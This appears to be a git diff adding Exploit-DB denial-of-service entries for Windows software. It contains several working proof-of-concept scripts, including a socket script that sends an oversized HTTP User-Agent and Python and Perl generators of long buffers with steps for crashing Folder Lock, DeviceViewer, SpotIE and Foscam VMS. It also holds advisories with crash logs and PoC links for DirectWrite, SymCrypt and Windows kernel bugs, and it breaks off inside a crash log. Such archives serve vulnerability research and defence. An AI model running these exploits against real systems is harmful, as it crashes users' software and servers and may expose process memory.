+
+pwnd = "A" * 5000
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(('192.168.50.133', 80))
+buf = ""
+buf += "GET / HTTP/1.1" + "\r\n"
+buf += "Host: 192.168.50.133\r\n"
+buf += "User-Agent: " + pwnd + "r\n"
+buf += "\r\n\r\n"
+s.send(buf)
+s.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47381.txt b/exploits/windows/dos/47381.txt
new file mode 100644
index 000000000..d8849a82e
--- /dev/null
+++ b/exploits/windows/dos/47381.txt
@@ -0,0 +1,109 @@
+Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as the Chrome, Firefox and Edge browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++.
+
+Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!SplicePixel, while rasterizing the glyphs of a slightly malformed OpenType font. The problem reproduces in all major browsers; below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded:
+
+--- cut ---
+(281c.25d4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!SplicePixel+0x14b:
+00007fff`b8634473 488b14f0        mov     rdx,qword ptr [rax+rsi*8] ds:00000227`c62d95b0=????????????????
+
+0:031> u
+DWrite!SplicePixel+0x14b:
+00007fff`b8634473 488b14f0        mov     rdx,qword ptr [rax+rsi*8]
+00007fff`b8634477 4885d2          test    rdx,rdx
+00007fff`b863447a 7474            je      DWrite!SplicePixel+0x1c8 (00007fff`b86344f0)
+00007fff`b863447c 458d4b01        lea     r9d,[r11+1]
+00007fff`b8634480 8b4208          mov     eax,dword ptr [rdx+8]
+00007fff`b8634483 413bc1          cmp     eax,r9d
+00007fff`b8634486 7f68            jg      DWrite!SplicePixel+0x1c8 (00007fff`b86344f0)
+00007fff`b8634488 488b0a          mov     rcx,qword ptr [rdx]
+
+0:031> ? rax
+Evaluate expression: 2369851854688 = 00000227`c62d8f60
+
+0:031> ? rsi
+Evaluate expression: 202 = 00000000`000000ca
+
+0:031> dd rax
+00000227`c62d8f60  ???????? ???????? ???????? ????????
+00000227`c62d8f70  ???????? ???????? ???????? ????????
+00000227`c62d8f80  ???????? ???????? ???????? ????????
+00000227`c62d8f90  ???????? ???????? ???????? ????????
+00000227`c62d8fa0  ???????? ???????? ???????? ????????
+00000227`c62d8fb0  ???????? ???????? ???????? ????????
+00000227`c62d8fc0  ???????? ???????? ???????? ????????
+00000227`c62d8fd0  ???????? ???????? ???????? ????????
+
+0:031> k
+ # Child-SP          RetAddr           Call Site
+00 000000b4`ceaebe00 00007fff`b8634306 DWrite!SplicePixel+0x14b
+01 000000b4`ceaebe50 00007fff`b8633325 DWrite!SetPixelInDropOut+0x9a
+02 000000b4`ceaebe90 00007fff`b86322a8 DWrite!FillInInflection+0xcd
+03 000000b4`ceaebf00 00007fff`b863281b DWrite!DoXInflections+0x118
+04 000000b4`ceaebf40 00007fff`b86319ca DWrite!EditBlackSpace+0x29f
+05 000000b4`ceaebfa0 00007fff`b8636118 DWrite!CScan+0x72
+06 000000b4`ceaebff0 00007fff`b855b1b2 DWrite!CScanFill+0x204
+07 000000b4`ceaec0e0 00007fff`b848ccef DWrite!DoType1InterpretCharString+0xcd77a
+08 000000b4`ceaec790 00007fff`b862ea16 DWrite!Type1InterpretCharString+0x163
+09 000000b4`ceaec880 00007fff`b862dd49 DWrite!BuildRuns+0x186
+0a 000000b4`ceaec9b0 00007fff`b862b2b9 DWrite!ATMBuildBitMap+0xb9
+0b 000000b4`ceaeca80 00007fff`b85b88b7 DWrite!AdobeInternalGetBitmap+0x31d
+0c 000000b4`ceaecd20 00007fff`b85b877a DWrite!CffRasterizer::Implementation::GetBitmap+0x11f
+0d 000000b4`ceaece60 00007fff`b84e2c89 DWrite!CffRasterizer::GetBitmap+0x2a
+0e 000000b4`ceaecea0 00007fff`b84b1754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x111
+0f 000000b4`ceaecee0 00007fff`c8e3e1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264
+10 000000b4`ceaed150 00007fff`c8e3e95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62
+11 000000b4`ceaed200 00007fff`c8e460b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f
+12 000000b4`ceaed250 00007fff`c8e5572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0
+13 000000b4`ceaed390 00007fff`c8ebffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d
+14 000000b4`ceaed6a0 00007fff`c8e5379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134
+15 000000b4`ceaed7b0 00007fff`c8e6e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce
+16 000000b4`ceaed860 00007fff`c8e6a0ae d2d1!CBatchSerializer::FlushInternal+0x13f
+17 000000b4`ceaed8f0 00007fff`c8e6143b d2d1!DrawingContext::Flush+0x96
+18 000000b4`ceaed950 00007fff`9dba551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b
+19 000000b4`ceaeda90 00007fff`9da3a704 edgehtml!CDXRenderTarget::EndDrawD2D+0x66
+1a 000000b4`ceaedac0 00007fff`9da3a4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184
+1b 000000b4`ceaedaf0 00007fff`9db9db85 edgehtml!CDXRenderTarget::EndDraw+0x38
+1c 000000b4`ceaedb40 00007fff`9db9da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145
+1d 000000b4`ceaedbe0 00007fff`9da2585f edgehtml!CDispNodeDestination::EndRender+0x6b
+1e 000000b4`ceaedc50 00007fff`9db660c1 edgehtml!CDispNodeDestination::EndRect+0xaf
+1f 000000b4`ceaedc90 00007fff`9da1cf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31
+20 000000b4`ceaedcc0 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x583
+21 000000b4`ceaede30 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365
+22 000000b4`ceaedfc0 00007fff`9da1ee43 edgehtml!CDispNode::DrawInternal+0x7ce
+23 000000b4`ceaee350 00007fff`9da1d747 edgehtml!CDispNode::Draw+0x943
+24 000000b4`ceaee560 00007fff`9da1d297 edgehtml!CDispContainer::DrawChildren+0x227
+25 000000b4`ceaee620 00007fff`9da1cbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127
+26 000000b4`ceaee710 00007fff`9d9de055 edgehtml!CDispContainer::DrawSelfContent+0x1c8
+27 000000b4`ceaee880 00007fff`9d9df37e edgehtml!CDispContainer::DrawSelf+0x365
+28 000000b4`ceaeea10 00007fff`9da1ead3 edgehtml!CDispNode::DrawInternal+0x7ce
+29 000000b4`ceaeeda0 00007fff`9da2a8fc edgehtml!CDispNode::Draw+0x5d3
+2a 000000b4`ceaeefb0 00007fff`9da29b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c
+2b 000000b4`ceaef0a0 00007fff`9da297f5 edgehtml!CDispRoot::DrawRoot+0x1b8
+2c 000000b4`ceaef2f0 00007fff`9daa452c edgehtml!CPaintHandler::RenderInternal+0x2b5
+2d 000000b4`ceaef870 00007fff`9d9c4ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c
+2e 000000b4`ceaef8e0 00007fff`9dbaa80d edgehtml!CRenderThread::ProcessRenderWork+0xdc
+2f 000000b4`ceaef940 00007fff`9dacfdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad
+30 000000b4`ceaef9b0 00007fff`9dbe7542 edgehtml!CRenderThread::RenderThread+0x229
+31 000000b4`ceaefa50 00007fff`cec537e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42
+32 000000b4`ceaefa80 00007fff`cf5bcb81 KERNEL32!BaseThreadInitThunk+0x14
+33 000000b4`ceaefab0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
+--- cut ---
+
+We have minimized the test case to a single-byte difference in relation to the original file. When decompiled with the "ttx" utility from the fontTools package, the difference becomes obvious: it's a change of one of the FontMatrix values inside the CFF table.
+
+Original data:
+
+<FontMatrix value="0.001 0.0 0.000123 0.001 0.0 0.0"/>
+
+Mutated data:
+
+<FontMatrix value="0.001 2000000.0 0.000123 0.001 0.0 0.0"/>
+
+The issue reproduces on a fully updated Windows 7 and Windows 10 1709; we haven't tested other versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are the minimized PoC font, original font, an HTML file to reproduce the bug in a browser, and 3 extra non-minimized samples which also trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47381.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47382.txt b/exploits/windows/dos/47382.txt
new file mode 100644
index 000000000..c11a091a9
--- /dev/null
+++ b/exploits/windows/dos/47382.txt
@@ -0,0 +1,79 @@
+Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as web browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++.
+
+Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!sfac_GetSbitBitmap, while rasterizing the glyphs of a slightly malformed TrueType font. The problem reproduces in Microsoft Edge (supposedly not in Chrome and Firefox due to OpenType Sanitizer); below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded:
+
+--- cut ---
+(4368.698c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+DWrite!sfac_GetSbitBitmap+0x2ad:
+00007ffe`b1ce47bd 410fb65500      movzx   edx,byte ptr [r13] ds:000001b9`94823000=??
+
+0:036> u
+DWrite!sfac_GetSbitBitmap+0x2ad:
+00007ffe`b1ce47bd 410fb65500      movzx   edx,byte ptr [r13]
+00007ffe`b1ce47c2 0811            or      byte ptr [rcx],dl
+00007ffe`b1ce47c4 49ffc5          inc     r13
+00007ffe`b1ce47c7 48ffc1          inc     rcx
+00007ffe`b1ce47ca 66413bc3        cmp     ax,r11w
+00007ffe`b1ce47ce 7471            je      DWrite!sfac_GetSbitBitmap+0x331 (00007ffe`b1ce4841)
+00007ffe`b1ce47d0 66ffc0          inc     ax
+00007ffe`b1ce47d3 ebd1            jmp     DWrite!sfac_GetSbitBitmap+0x296 (00007ffe`b1ce47a6)
+
+0:036> k
+ # Child-SP          RetAddr           Call Site
+00 000000a3`a00ec740 00007ffe`b1ce3aaa DWrite!sfac_GetSbitBitmap+0x2ad
+01 000000a3`a00ec840 00007ffe`b1ce3954 DWrite!GetSbitComponent+0xfe
+02 000000a3`a00ec950 00007ffe`b1d4cc66 DWrite!sbit_GetBitmap+0xd0
+03 000000a3`a00eca10 00007ffe`b1d43dfe DWrite!fs_ContourScan+0x3b6
+04 000000a3`a00ecaf0 00007ffe`b1d43e98 DWrite!TrueTypeRasterizer::Implementation::GetBitmapInternal+0xe6
+05 000000a3`a00ecb40 00007ffe`b1d42c03 DWrite!TrueTypeRasterizer::Implementation::GetBitmap+0x30
+06 000000a3`a00ecbb0 00007ffe`b1d11754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x8b
+07 000000a3`a00ecbf0 00007ffe`bf4de1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264
+08 000000a3`a00ece60 00007ffe`bf4de95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62
+09 000000a3`a00ecf10 00007ffe`bf4e60b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f
+0a 000000a3`a00ecf60 00007ffe`bf4f572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0
+0b 000000a3`a00ed0a0 00007ffe`bf55ffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d
+0c 000000a3`a00ed3b0 00007ffe`bf4f379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134
+0d 000000a3`a00ed4c0 00007ffe`bf50e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce
+0e 000000a3`a00ed570 00007ffe`bf50a0ae d2d1!CBatchSerializer::FlushInternal+0x13f
+0f 000000a3`a00ed600 00007ffe`bf50143b d2d1!DrawingContext::Flush+0x96
+10 000000a3`a00ed660 00007ffe`99d3551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b
+11 000000a3`a00ed7a0 00007ffe`99bca704 edgehtml!CDXRenderTarget::EndDrawD2D+0x66
+12 000000a3`a00ed7d0 00007ffe`99bca4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184
+13 000000a3`a00ed800 00007ffe`99d2db85 edgehtml!CDXRenderTarget::EndDraw+0x38
+14 000000a3`a00ed850 00007ffe`99d2da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145
+15 000000a3`a00ed8f0 00007ffe`99bb585f edgehtml!CDispNodeDestination::EndRender+0x6b
+16 000000a3`a00ed960 00007ffe`99cf60c1 edgehtml!CDispNodeDestination::EndRect+0xaf
+17 000000a3`a00ed9a0 00007ffe`99bacf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31
+18 000000a3`a00ed9d0 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x583
+19 000000a3`a00edb40 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365
+1a 000000a3`a00edcd0 00007ffe`99baee43 edgehtml!CDispNode::DrawInternal+0x7ce
+1b 000000a3`a00ee060 00007ffe`99bad747 edgehtml!CDispNode::Draw+0x943
+1c 000000a3`a00ee270 00007ffe`99bad297 edgehtml!CDispContainer::DrawChildren+0x227
+1d 000000a3`a00ee330 00007ffe`99bacbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127
+1e 000000a3`a00ee420 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x1c8
+1f 000000a3`a00ee590 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365
+20 000000a3`a00ee720 00007ffe`99baead3 edgehtml!CDispNode::DrawInternal+0x7ce
+21 000000a3`a00eeab0 00007ffe`99bba8fc edgehtml!CDispNode::Draw+0x5d3
+22 000000a3`a00eecc0 00007ffe`99bb9b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c
+23 000000a3`a00eedb0 00007ffe`99bb97f5 edgehtml!CDispRoot::DrawRoot+0x1b8
+24 000000a3`a00ef000 00007ffe`99c3452c edgehtml!CPaintHandler::RenderInternal+0x2b5
+25 000000a3`a00ef580 00007ffe`99b54ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c
+26 000000a3`a00ef5f0 00007ffe`99d3a80d edgehtml!CRenderThread::ProcessRenderWork+0xdc
+27 000000a3`a00ef650 00007ffe`99c5fdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad
+28 000000a3`a00ef6c0 00007ffe`99d77542 edgehtml!CRenderThread::RenderThread+0x229
+29 000000a3`a00ef760 00007ffe`c32937e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42
+2a 000000a3`a00ef790 00007ffe`c5e1cb81 KERNEL32!BaseThreadInitThunk+0x14
+2b 000000a3`a00ef7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
+--- cut ---
+
+We have minimized the test cases to a 1-byte difference in the EBLC table, and a 2-byte difference in the EBDT table in relation to the original files.
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested other versions of the system. It could be used to disclose sensitive data from the process address space, which is clearly visible when opening the PoC HTML files in Edge. In most cases, instead of crashing, the browser will display random chunks of heap memory residing after the glyph's bitmap allocation. As shown in 1/poc.html and 2/poc.html, the problems are related to glyphs corresponding to characters with codes 0xF0 and 0x2020, respectively.
+
+Attached is a pair of minimized PoC fonts, original fonts, and HTML files to reproduce the bug in a browser.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47382.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47383.py b/exploits/windows/dos/47383.py
new file mode 100755
index 000000000..ffe7225d9
--- /dev/null
+++ b/exploits/windows/dos/47383.py
@@ -0,0 +1,28 @@
+# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
+# Date: 12.09.2019
+# Vendor Homepage:https://www.newsoftwares.net/folderlock/
+# Software Link:  https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
+# Exploit Author: Achilles
+# Tested Version: 7.7.9
+# Tested on: Windows 7 x64
+
+
+# 1.- Run python code :Folder_Lock.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Folderlock and Click 'Enter Key'
+# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
+# 5.- Click 'Submit' and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47410.py b/exploits/windows/dos/47410.py
new file mode 100755
index 000000000..56dfe1275
--- /dev/null
+++ b/exploits/windows/dos/47410.py
@@ -0,0 +1,32 @@
+#!/usr/bin/python
+
+# Exploit Title: DeviceViewer 3.12.0.1 - 'creating user' DOS buffer overflow
+# Date: 9/23/2019
+# Exploit Author: x00pwn
+# Vendor Homepage: http://www.sricam.com/
+# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
+# Version: v3.12.0.1
+# Tested on: Windows 7
+
+# Steps to reproduce:
+#   1. Generate a malicious payload via the POC
+#   2. In the Sricam application create a new user
+#   3. When creating a new user, set the username as the malicious payload
+#   4. Observe a program DOScrash
+
+payload = "A" * 5000
+
+try:
+    evilCreate =open("exploit.txt","w")
+    print("""
+    DeviceViewer 3.12.0.1 DOS exploit POC
+    Author: Nu11pwn
+    """)
+    print("[x] Creating malicious file")
+    evilCreate.write(payload)
+    evilCreate.close()
+    print("[x] Malicious file create")
+    print("[x] When creating a new user, set the username to the file contents")
+    print("[x] Watch the program crash")
+except:
+    print("[!] File failed to be created")
\ No newline at end of file
diff --git a/exploits/windows/dos/47414.txt b/exploits/windows/dos/47414.txt
new file mode 100644
index 000000000..e91c74a24
--- /dev/null
+++ b/exploits/windows/dos/47414.txt
@@ -0,0 +1,11 @@
+There's a bug in the SymCrypt multi-precision arithmetic routines that can cause an infinite loop when calculating the modular inverse on specific bit patterns with bcryptprimitives!SymCryptFdefModInvGeneric.
+
+I've been able to construct an X.509 certificate that triggers the bug. I've found that embedding the certificate in an S/MIME message, authenticode signature, schannel connection, and so on will effectively DoS any windows server (e.g. ipsec, iis, exchange, etc) and (depending on the context) may require the machine to be rebooted. Obviously, lots of software that processes untrusted content (like antivirus) call these routines on untrusted data, and this will cause them to deadlock.
+
+You can verify it like so, and notice the command never completes:
+
+C:\> certutil.exe testcase.crt
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47414.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47418.txt b/exploits/windows/dos/47418.txt
new file mode 100644
index 000000000..c6ddce52f
--- /dev/null
+++ b/exploits/windows/dos/47418.txt
@@ -0,0 +1,29 @@
+# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service
+# Date: 2019-20-09
+# Exploit Author: Emilio Revelo
+# Vendor Homepage: http://www.nsauditor.com/
+# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe
+# Tested on: Windows 10 Pro x64 es
+# Version: 2.9.5
+
+# Steps to produce the DoS: 
+
+# 1.- Run perl script : perl SpotIE.pl
+# 2.- Open SpotIE.txt and copy the content to clipboard
+# 3.- Open SpotIE Internet Explorer Password Recovery
+# 4.- Navigate to Register -> Enter the registration name and key below...
+# 5.- Paste ClipBoard on "Key:"
+# 7.- Ok
+# 8.- Observe the program crash.
+
+#!/usr/local/bin/perl
+
+use strict;
+use warnings;
+
+my $filename = 'SpotIE.txt';
+open(my $fh, '>', $filename) or die "Could not open file '$filename' $!";
+print $fh "E"x256;
+close $fh;
+print "Done!\n";
+print "File: SpotIE.txt\n"
\ No newline at end of file
diff --git a/exploits/windows/dos/47478.py b/exploits/windows/dos/47478.py
new file mode 100755
index 000000000..b0d8e22c8
--- /dev/null
+++ b/exploits/windows/dos/47478.py
@@ -0,0 +1,25 @@
+# Exploit Title: Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC)
+# Author: Alessandro Magnosi
+# Date: 2019-10-09
+# Vendor Homepage: https://www.foscam.com/
+# Software Link : https://www.foscam.com/downloads/appsoftware.html?id=5
+# Tested Version: 1.1.6.6
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 7 SP1 x86 en, Windows 10 Pro x64 it
+
+# Steps to Produce the Crash: 
+# 1.- Run python code : python foscam-vms-uid-dos.py
+# 2.- Open FoscamVMS1.1.6.txt and copy its content to clipboard
+# 3.- Open FoscamVMS
+# 4.- Go to Add Device
+# 5.- Choose device type "NVR"
+# 6.- Copy the content of the file into UID
+# 7.- Click on Login Check
+# 8.- Crashed
+
+#!/usr/bin/python
+ 
+buffer = "A" * 5000
+f = open ("FoscamVMS1.1.6.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47484.txt b/exploits/windows/dos/47484.txt
new file mode 100644
index 000000000..05bbb687c
--- /dev/null
+++ b/exploits/windows/dos/47484.txt
@@ -0,0 +1,81 @@
+We have encountered a Windows kernel crash in the win32k.sys driver while processing a corrupted TTF font file. An example crash log excerpt generated after triggering the bug is shown below:
+
+--- cut ---
+*** Fatal System Error: 0x00000050
+                       (0xFFFFF900C1E1C003,0x0000000000000001,0xFFFFF9600006D2A8,0x0000000000000000)
+
+Driver at fault: 
+***    win32k.sys - Address FFFFF9600006D2A8 base at FFFFF96000010000, DateStamp 5d0c4490
+
+[...]
+
+1: kd> !analyze -v
+*******************************************************************************
+*                                                                             *
+*                        Bugcheck Analysis                                    *
+*                                                                             *
+*******************************************************************************
+
+PAGE_FAULT_IN_NONPAGED_AREA (50)
+Invalid system memory was referenced.  This cannot be protected by try-except.
+Typically the address is just plain bad or it is pointing at freed memory.
+Arguments:
+Arg1: fffff900c1e1c003, memory referenced.
+Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
+Arg3: fffff9600006d2a8, If non-zero, the instruction address which referenced the bad memory
+	address.
+Arg4: 0000000000000000, (reserved)
+
+[...]
+
+TRAP_FRAME:  fffff880082791f0 -- (.trap 0xfffff880082791f0)
+NOTE: The trap frame does not contain all registers.
+Some register values may be zeroed or incorrect.
+rax=0000000000000000 rbx=0000000000000000 rcx=fffff900c1e1bfb8
+rdx=000000000000000a rsi=0000000000000000 rdi=0000000000000000
+rip=fffff9600006d2a8 rsp=fffff88008279380 rbp=000000000000000c
+ r8=fffff960002f5750  r9=0000000000000002 r10=fffff900c1e1bfe9
+r11=fffff900c1e1bff3 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0         nv up ei pl nz na po nc
+win32k!ulClearTypeFilter+0x214:
+fffff960`0006d2a8 8807            mov     byte ptr [rdi],al ds:00000000`00000000=??
+Resetting default scope
+
+LAST_CONTROL_TRANSFER:  from fffff80002b65a22 to fffff80002ab1520
+
+STACK_TEXT:  
+fffff880`08278928 fffff800`02b65a22 : fffff900`c1e1c003 fffffa80`310f1b50 00000000`00000065 fffff800`02a82658 : nt!RtlpBreakWithStatusInstruction
+fffff880`08278930 fffff800`02b66812 : fffff880`00000003 fffff880`082791f0 fffff800`02aba420 fffff880`08278f90 : nt!KiBugCheckDebugBreak+0x12
+fffff880`08278990 fffff800`02aaada4 : 00000000`00000068 fffff880`08279450 00000000`00010000 00000000`00000000 : nt!KeBugCheck2+0x722
+fffff880`08279060 fffff800`02b847b2 : 00000000`00000050 fffff900`c1e1c003 00000000`00000001 fffff880`082791f0 : nt!KeBugCheckEx+0x104
+fffff880`082790a0 fffff800`02ab6ddc : 00000000`00000001 fffff900`c1e1c003 00000000`00000000 fffff900`c1e1bf94 : nt!MmAccessFault+0x2322
+fffff880`082791f0 fffff960`0006d2a8 : 00000000`00000000 fffff800`00000001 fffff880`08279450 fffff900`c1e1bf94 : nt!KiPageFault+0x35c
+fffff880`08279380 fffff960`0007097a : fffff900`c1a40010 fffff900`c1a40010 fffff880`08279928 00000000`00000002 : win32k!ulClearTypeFilter+0x214
+fffff880`08279400 fffff960`0006ce00 : fffff880`0827b67b fffff880`08279928 fffff900`c1b71010 fffff960`00000b70 : win32k!xInsertMetricsPlusRFONTOBJ+0x20e
+fffff880`082794d0 fffff960`0006caa0 : fffff880`08279a00 fffff880`08279928 00000000`00000000 00000000`0000000a : win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x1f0
+fffff880`08279550 fffff960`0006c498 : 00000000`00000000 fffff880`082796f0 fffff900`c00cb010 00000000`00000008 : win32k!ESTROBJ::vCharPos_H3+0x168
+fffff880`082795d0 fffff960`0006d955 : 00000000`41800000 00000000`00000000 00000000`00000007 fffff880`082796f0 : win32k!ESTROBJ::vInit+0x350
+fffff880`08279660 fffff960`0006d5f7 : fffff880`08279b60 fffff900`c1a40010 fffffa80`00000020 00000000`ffffffff : win32k!GreGetTextExtentExW+0x275
+fffff880`08279920 fffff800`02ab8d53 : 00000000`5a010611 fffff880`00000b40 00000000`00000040 00000000`00000000 : win32k!NtGdiGetTextExtentExW+0x237
+fffff880`08279a70 00000000`74da204a : 00000000`74d8c46f 00000000`00010000 00000000`74d8b947 00000000`002ff888 : nt!KiSystemServiceCopyEnd+0x13
+00000000`001adca8 00000000`74d8c46f : 00000000`00010000 00000000`74d8b947 00000000`002ff888 00000000`75ad5600 : wow64win!NtGdiGetTextExtentExW+0xa
+00000000`001adcb0 00000000`74dcd18f : 00000000`002ff88c 00000000`7efdb000 00000000`7efdb000 00000000`7efdd000 : wow64win!whNtGdiGetTextExtentExW+0x43
+00000000`001add00 00000000`74d52776 : 00000000`779a01e4 00000000`74dc0023 00000000`00000246 00000000`002ffeec : wow64!Wow64SystemServiceEx+0xd7
+00000000`001ae5c0 00000000`74dcd286 : 00000000`00000000 00000000`74d51920 00000000`777d3128 00000000`7780c4f1 : wow64cpu!ServiceNoTurbo+0x2d
+00000000`001ae680 00000000`74dcc69e : 00000000`00000000 00000000`00000000 00000000`74dc4b10 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa
+00000000`001ae6d0 00000000`778043c3 : 00000000`004f2d50 00000000`00000000 00000000`77902e70 00000000`777d7550 : wow64!Wow64LdrpInitialize+0x42a
+00000000`001aec20 00000000`77869780 : 00000000`00000000 00000000`77876c7d 00000000`001af1d0 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e3
+00000000`001af110 00000000`7781371e : 00000000`001af1d0 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? ::FNODOBFM::`string'+0x22790
+00000000`001af180 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe
+--- cut ---
+
+The type of the bugcheck implies a pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf", "hmtx" and "prep" tables.
+
+The issue reproduces on Windows 7 and Windows Server 2008 R2 (64-bit), with and without Special Pools enabled for win32k.sys.
+
+Attached is an archive with the proof-of-concept mutated TTF file, the original font used to generate it and the source code of a simple harness program, which loads the given font and displays all of its glyphs at different point sizes on the screen. Running the harness against the provided font is required to trigger the crash, and it only occurs after a few seconds (while processing the 2nd LOGFONT).
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47484.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47485.txt b/exploits/windows/dos/47485.txt
new file mode 100644
index 000000000..352a0ddb8
--- /dev/null
+++ b/exploits/windows/dos/47485.txt
@@ -0,0 +1,80 @@
+We have encountered a Windows kernel crash in nt!MiOffsetToProtos while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below:
+
+--- cut ---
+*** Fatal System Error: 0x0000003b
+                       (0x00000000C0000005,0xFFFFF8006F0860C4,0xFFFFD20AD8E1E290,0x0000000000000000)
+
+Break instruction exception - code 80000003 (first chance)
+
+A fatal system error has occurred.
+Debugger entered on first try; Bugcheck callbacks have not been invoked.
+
+A fatal system error has occurred.
+
+For analysis of this file, run !analyze -v
+nt!DbgBreakPointWithStatus:
+fffff800`6f1c46a0 cc              int     3
+1: kd> !analyze -v
+
+*******************************************************************************
+*                                                                             *
+*                        Bugcheck Analysis                                    *
+*                                                                             *
+*******************************************************************************
+
+SYSTEM_SERVICE_EXCEPTION (3b)
+An exception happened while executing a system service routine.
+Arguments:
+Arg1: 00000000c0000005, Exception code that caused the bugcheck
+Arg2: fffff8006f0860c4, Address of the instruction which caused the bugcheck
+Arg3: ffffd20ad8e1e290, Address of the context record for the exception that caused the bugcheck
